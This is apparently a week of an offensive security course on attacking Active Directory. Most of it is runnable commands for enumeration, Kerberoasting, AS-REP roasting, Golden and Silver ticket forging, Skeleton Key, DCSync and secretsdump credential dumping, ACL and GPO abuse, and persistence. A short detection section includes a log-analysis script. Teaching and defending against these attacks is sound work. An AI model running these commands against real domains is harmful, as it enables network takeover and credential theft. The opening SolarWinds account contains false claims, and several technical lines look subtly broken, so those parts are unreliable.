Week 10: Active Directory Attacks
MITRE ATT&CK: Tactic — TA0008 (Lateral Movement), TA0004 (Privilege Escalation), Technique — T1558 (Steal or Forge Kerberos Tickets)
Real-World Attack Scenario: The SolarWinds Supply Chain Attack (2020)
The SolarWinds attack is the most sophisticated AD attack in history:
- Initial Access: Compromised SolarWinds build server; injected malware into Orion update
- Persistence via Update: 18,000 customers downloaded infected update
- AD Enumeration: On first victim (FireEye), used BloodHound to map AD permissions
- Kerberos Attacks: Used Golden Ticket with stolen krbtgt hash
- Lateral Movement: Moved from Orion server to Azure AD/Exchange
- Cloud Pivot: Used compromised AD to access Microsoft 365 cloud services
- Golden Ticket Lifetime: Maintained access for 8+ months using forged Kerberos tickets
AD attack techniques used in SolarWinds:
- Golden Ticket (TGT forged with stolen krbtgt hash)
- Silver Ticket (TGS forged for specific services)
- DCSync (mimicked domain controller replication)
- SAML token forgery (cloud identity attack)
Attack chain visualization:
Infected Update → FireEye Red Team machine → BloodHound enum
→ Golden Ticket with krbtgt hash → Azure AD/Exchange
→ SAML token forgery → 18,000 downstream customers
Why this week matters: 95% of Fortune 500 companies use Active Directory. Compromising AD means owning the entire network. SolarWinds showed that even organizations with mature security can be owned through AD attack chains.
Objectives
- Understand Active Directory architecture and components
- Master Kerberos attacks (AS-REP, Kerberoast, Golden/Silver tickets)
- Perform BloodHound enumeration and analysis
- Execute domain privilege escalation and persistence
AD Architecture Fundamentals
Core Components
Domain Controller (DC): LDAP, Kerberos, DNS, SMB, Replication
Forest: Collection of domains with shared schema
Domain: Logical grouping of users/computers
Organizational Unit (OU): Container for organizing resources
Trust: Relationships between domains/forests
Authentication Protocols
NTLM: Challenge-response, weaker, legacy
Kerberos: Ticket-based, timestamp-based, preferred
Kerberos Flow
1. Client → KDC (AS): AS-REQ (who am I, I want TGT)
2. KDC → Client: AS-REP (TGT + session key, encrypted with user's hash)
3. Client → KDC (TGS): TGS-REQ (I want to access service X)
4. KDC → Client: TGS-REP (service ticket, encrypted with service hash)
5. Client → Server: AP-REQ (service ticket + authenticator)
6. Server → Client: AP-REP (optional, mutual auth)
Initial Enumeration
LDAPS and SAMR Enum
```bash
# enum4linux
enum4linux -a 10.0.0.5
# rpcclient (null session, no password prompt)
rpcclient -U "" -N 10.0.0.5
> enumdomusers
> enumdomgroups
> querydominfo
> getdompwinfo
# lookupsid (brute force SIDs)
python3 lookupsid.py DOMAIN/username:password@10.0.0.5
# windapsearch (Go)
windapsearch --dc 10.0.0.5 -u DOMAIN\\username -p password --enum-users
windapsearch --dc 10.0.0.5 -u DOMAIN\\username -p password --enum-groups
windapsearch --dc 10.0.0.5 -u DOMAIN\\username -p password --enum-computers
```
BloodHound (Critical Tool)
```bash
# Install the Python ingestor
pip3 install bloodhound
# Or use ingestor.py from https://github.com/BloodHoundAD/BloodHound
# Run ingestor (from Kali to target domain)
python3 bloodhound.py -c All -u username@DOMAIN -p password -d DOMAIN -dc 10.0.0.5
# Or with credentials only (no domain join needed)
python3 bloodhound.py -c All -u username -p password -d DOMAIN -dc 10.0.0.5
# Collect with SharpHound (if you have a shell on Windows; these two lines are PowerShell)
# Upload SharpHound.ps1, dot-source it, then run the collector
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Domain DOMAIN -DomainController 10.0.0.5
# Import the output into Neo4j + BloodHound GUI
# Analyze paths to Domain Admin
```
Kerberos Attacks
AS-REP Roasting (Pre-Auth Disabled)
```bash
# Find users with "Do not require Kerberos pre-authentication" set
# In BloodHound: Custom Query
# Find accounts where UF_DONT_REQUIRE_PREAUTH is set
# Using GetNPUsers.py (impacket)
python3 GetNPUsers.py DOMAIN/ -usersfile users.txt -format hashcat -outputfile hashes.txt
python3 GetNPUsers.py DOMAIN/username -request -outputfile hash.txt
# Crack with hashcat
hashcat -m 18200 hashes.txt wordlist.txt
# Or john
john hashes.txt --wordlist=wordlist.txt
# The hash is an AS-REP encrypted with the user's password hash
# If cracked, it gives the user's password
```
Kerberoasting (Service Accounts)
```bash
# Request TGS for service accounts (without -request the script only lists SPNs)
python3 GetUserSPNs.py DOMAIN/username:password -request -outputfile spn_hashes.txt
python3 GetUserSPNs.py DOMAIN/username:password -request -request-user targetuser
# Crack with hashcat
hashcat -m 13100 spn_hashes.txt wordlist.txt
# Or Rubeus
.\Rubeus.exe kerberoast /domain:DOMAIN /outfile:hashes.txt
# Goal: Get service account password (often weak, sometimes privileged)
```
Golden Ticket (TGT forged)
```bash
# Requires: krbtgt hash
# Get krbtgt hash via secretsdump on DC
python3 secretsdump.py DOMAIN/username:password@10.0.0.5
# Create golden ticket with Mimikatz (on any domain-joined or non-joined machine)
mimikatz # kerberos::golden /domain:DOMAIN /sid:S-1-5-21-xxx /krbtgt:<ntlm_hash> /user:Administrator /ticket:golden.kirbi
# Or with ticketer.py
python3 ticketer.py -domain DOMAIN -domain-sid S-1-5-21-xxx -nthash <krbtgt_hash> -user-id 500 administrator
# Use ticket (pass-the-ticket), then test access from a normal command prompt
mimikatz # kerberos::ptt golden.kirbi
dir \\DC\c$
```
Silver Ticket (TGS forged)
```bash
# Requires: service account hash (NTLM)
# Forges service ticket directly (no DC needed)
# Mimikatz builds silver tickets with the same golden module, scoped by /target and /service
mimikatz # kerberos::golden /domain:DOMAIN /sid:S-1-5-21-xxx /target:DC.DOMAIN /service:cifs /rc4:<service_hash> /user:Administrator /ticket:silver.kirbi
# CIFS service = file access
# HOST = RPCR
# HTTP = WinRM/WebDAV
# Less detected than golden (accessing specific service)
```
Skeleton Key (DC malware)
```powershell
# In Mimikatz on DC
mimikatz # privilege::debug
mimikatz # misc::skeleton
# Now you can access any account with the password "mimikatz"
# Access: net use \\DC\c$ /user:Administrator mimikatz
```
DC Sync (DCSync)
```bash
# Mimikatz on any domain-joined machine with the necessary rights
mimikatz # privilege::debug
mimikatz # lsadump::dcsync /domain:DOMAIN /user:krbtgt
mimikatz # lsadump::dcsync /domain:DOMAIN /user:Administrator
mimikatz # lsadump::dcsync /domain:DOMAIN /all
# Or with secretsdump
python3 secretsdump.py DOMAIN/username:password@10.0.0.5
# This mimics DC replication and pulls all hashes from NTDS.dit
```
Domain Privilege Escalation
Common Priv-Esc Paths
1. User with SeEnableDelegationPrivilege → RBCD attack
2. Service accounts (SPN) → Kerberoast
3. Pre-auth disabled users → AS-REP roast
4. Generic All on object → Writeable GPO
5. Writeable DFSM
6. DNS Admins group → DC code execution
Resource-Based Constrained Delegation (RBCD)
```bash
# If you have SeEnableDelegationPrivilege or GenericAll on target
# Can make any machine trust another machine for delegation
# From Linux
python3 rbcd.py DOMAIN/attacker:password -k -t TARGET_COMPUTER -a ATTACKING_COMPUTER
# Then getST as the attacking computer to impersonate a user on the target
python3 getST.py -spn cifs/TARGET_COMPUTER -impersonate Administrator DOMAIN/ATTACKING_COMPUTER\$
```
ACL Attacks
```powershell
# Find interesting ACLs with BloodHound
# Path: User → HasPermissions → Group → MemberOf → Domain Admins
# WriteDACL on user object → Add yourself to group
# WriteDACL on group → Add yourself as member
# WriteOwner on group → Take ownership
# Using PowerView
Add-ObjectACL -TargetIdentity "TargetGroup" -PrincipalIdentity attacker -Rights ResetPassword
Add-ObjectACL -TargetIdentity "TargetGroup" -PrincipalIdentity attacker -Rights "WriteMembers"
# Or via LDAP with ldapdomaindump
```
GPO Abuse
```powershell
# If you have rights to modify a GPO
# Create an immediate scheduled task
New-GPOImmediateTask -GPOName "Vulnerable GPO" -TaskName "EvilTask" -Command "powershell.exe -enc BASE64..."
# Or edit the GPO manually
# Computer Configuration → Windows Settings → Scripts → Startup
# Or Scheduled Task
# Deliver via SYSVOL
\\DOMAIN\SYSVOL\DOMAIN\Policies\{GPO_GUID}\Machine\Scripts\Startup\
# Tools
SharpGPOAbuse.exe
```
Domain Persistence
Golden Ticket (Long-term)
```bash
# Already covered - persists until the krbtgt password is changed
# Default: never, or until DC promotion
# Password change interval: typically never
```
SID History
```powershell
# Add additional SIDs to a user's SID history
# Mimikatz
misc::setsid /sam:targetuser /sid:512 # 512 = Domain Admins
```
Skeleton Key (DC)
```bash
# Already covered - enables the password "mimikatz" on all accounts
```
DSRM Admin
```powershell
# DSRM password stored locally on each DC
# Once obtained, can be used to access the DC locally
# Dump DSRM hash
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # lsadump::sam
# Modify registry to allow the DSRM account to be used over the network
reg add HKLM\System\CurrentControlSet\Control\Lsa /v DSRMAdminLogonBehavior /t REG_DWORD /d 2
# Now access the DC with the DSRM hash
```
Defensive Tools & Detection
Detection
```bash
# Event ID 4768 (TGT requested) - watch for anomalous requests
# Event ID 4769 (TGS requested) - look for service accounts
# Event ID 4624 - account logon
# Event ID 4672 - special privileges assigned
# Monitor for:
# - AS-REP requests from non-DC sources
# - Kerberoasting (4769 without corresponding 4768)
# - Golden ticket (user logon with unusual lifetime or RID 502)
# - DCSync (replication operations from non-DC)
```
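As an added defender-side example (not part of the course material or any tool it names), here is a small detector that applies the heuristics listed above to constructed 4768/4769 records. The record field names, the IP addresses, the DC list and the burst threshold are all assumptions for the demo.

```python
from collections import defaultdict

# Constructed sample 4768 (TGT request) / 4769 (TGS request) records, not real logs.
# Fields mirror the Security log: IpAddress, TargetUserName, ServiceName,
# TicketEncryptionType (0x17 = RC4-HMAC, 0x12 = AES256) and PreAuthType (4768 only).
SAMPLE_EVENTS = [
    {"id": 4768, "ip": "10.0.0.21", "user": "alice", "preauth": 2, "enc": "0x12"},
    {"id": 4769, "ip": "10.0.0.21", "user": "alice", "service": "DC01$", "enc": "0x12"},
    {"id": 4768, "ip": "10.0.0.42", "user": "svc_backup", "preauth": 0, "enc": "0x17"},
    {"id": 4769, "ip": "10.0.0.99", "user": "bob", "service": "svc_sql", "enc": "0x17"},
    {"id": 4769, "ip": "10.0.0.99", "user": "bob", "service": "svc_web", "enc": "0x17"},
    {"id": 4769, "ip": "10.0.0.99", "user": "bob", "service": "svc_ftp", "enc": "0x17"},
]
DC_IPS = {"10.0.0.5"}  # assumed: the domain controllers' own addresses

def analyze_kerberos_events(events, dc_ips=DC_IPS, burst=3):
    """Apply the section's heuristics; return a list of (rule, detail) findings."""
    findings = []
    tgt_sources = {e["ip"] for e in events if e["id"] == 4768}
    rc4_services = defaultdict(set)  # source ip -> user-account SPNs requested with RC4
    flagged_no_tgt = set()
    for e in events:
        # AS-REP roasting exposure: a TGT issued with Pre-Authentication Type 0
        if e["id"] == 4768 and e["preauth"] == 0:
            findings.append(("asrep-roast", f"{e['user']} from {e['ip']} got a TGT without pre-auth"))
        if e["id"] != 4769:
            continue
        ip = e["ip"]
        # 4769 with no 4768 from the same source: the TGT was never requested here,
        # consistent with an injected or forged ticket. In production the lookback
        # must cover the TGT lifetime and every DC's log, or this false-positives.
        if ip not in tgt_sources and ip not in dc_ips and ip not in flagged_no_tgt:
            flagged_no_tgt.add(ip)
            findings.append(("tgs-without-tgt", f"{ip} requested a TGS with no prior TGT request"))
        # Kerberoasting: RC4 service tickets for user accounts (not machine$ or krbtgt),
        # many distinct SPNs from one source in a short window
        svc = e["service"]
        if e["enc"] == "0x17" and not svc.endswith("$") and svc.lower() != "krbtgt":
            rc4_services[ip].add(svc)
    for ip, services in rc4_services.items():
        if len(services) >= burst:
            findings.append(("kerberoast", f"{ip} requested RC4 tickets for {sorted(services)}"))
    return findings

if __name__ == "__main__":
    for rule, detail in analyze_kerberos_events(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

Tune `burst` and the lookback window to your environment; a single RC4 4769 is normal for legacy services, so the rule keys on volume of distinct user-account SPNs from one source.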
Tool: kekeo
```bash
# From Benjamin DELPY
# Advanced Kerberos operations
```
Practice Labs
Lab 1: Kerberoast
```bash
# Get shell on a domain-joined machine
# Enumerate SPNs
python3 GetUserSPNs.py DOMAIN/user:password -dc-ip 10.0.0.5
# Request tickets
python3 GetUserSPNs.py DOMAIN/user:password -request
# Crack
hashcat -m 13100 spn_hash.txt wordlist.txt
```
Lab 2: BloodHound Analysis
```bash
# Run collector
python3 bloodhound.py -c All -u user@DOMAIN -p password
# Open BloodHound GUI
# Run queries:
# - Shortest path to Domain Admins
# - Find Kerberoastable users
# - Find AS-REP roastable users
# - Find users with GetChangesAll privilege
```
Lab 3: Golden Ticket
```bash
# Get krbtgt hash via DCSync or secretsdump on DC
# Create ticket
mimikatz # kerberos::golden /domain:DOMAIN /sid:S-1-5-21-xxx /krbtgt:HASH /user:fakeadmin /ticket:golden.kirbi
# Use ticket
kerberos::ptt golden.kirbi
# Now access as fakeadmin
```
Key Takeaways
- Kerberos — understand TGT/TGS flow; all attacks exploit this
- Kerberoasting — request TGS for service accounts, crack offline
- AS-REP roasting — users without pre-auth can be cracked
- Golden/Silver tickets — forge tickets with stolen hashes
- BloodHound — graph your AD permissions; find attack paths
- DCSync — pull all hashes from DC like another DC would
Next Week Preview
Week 11 covers Red Team Operations — advanced persistent threat simulation, C2 frameworks, lateral movement chains, and avoiding detection.